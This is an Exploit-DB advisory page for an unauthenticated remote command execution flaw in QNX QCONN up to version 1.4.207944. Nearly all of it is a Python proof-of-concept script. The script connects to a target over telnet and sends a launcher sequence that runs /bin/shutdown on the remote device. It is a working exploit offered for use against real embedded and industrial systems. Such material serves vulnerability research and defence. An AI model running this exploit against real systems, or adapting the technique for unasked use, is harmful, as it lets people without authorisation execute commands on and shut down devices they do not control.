QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability

2012-09-25T00:00:00
ID EDB-ID:21520
Type exploitdb
Reporter Mor!p3r
Modified 2012-09-25T00:00:00

Description

QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability. Remote exploit for linux platform

                                        
                                            # Title : QNX QCONN Remote Command Execution Vurnerability
# Version : QNX 6.5.0 &gt;= , QCONN &gt;= 1.4.207944
# Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)
# Vendor : http://www.qnx.com
# Date : 2012/09/09
# CVE : N/A
# Exploit Author : Mor!p3r(moriper[at]gmail.com)

import telnetlib
import sys

if len(sys.argv) &lt; 3:
  print " "
  print " -----------------------------------------------------"
  print " + Qconn Remote Command Execution PoC (Shutdown) +"
  print " -----------------------------------------------------"
  print " "
  print " + Usage: QCONNRC.py &lt;Target IP&gt; &lt;Port&gt;"
  print "    + Ex&gt; QCONNRC.py 192.168.0.1 8000"
  print ""
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print "[+] Finish"
telnet.close()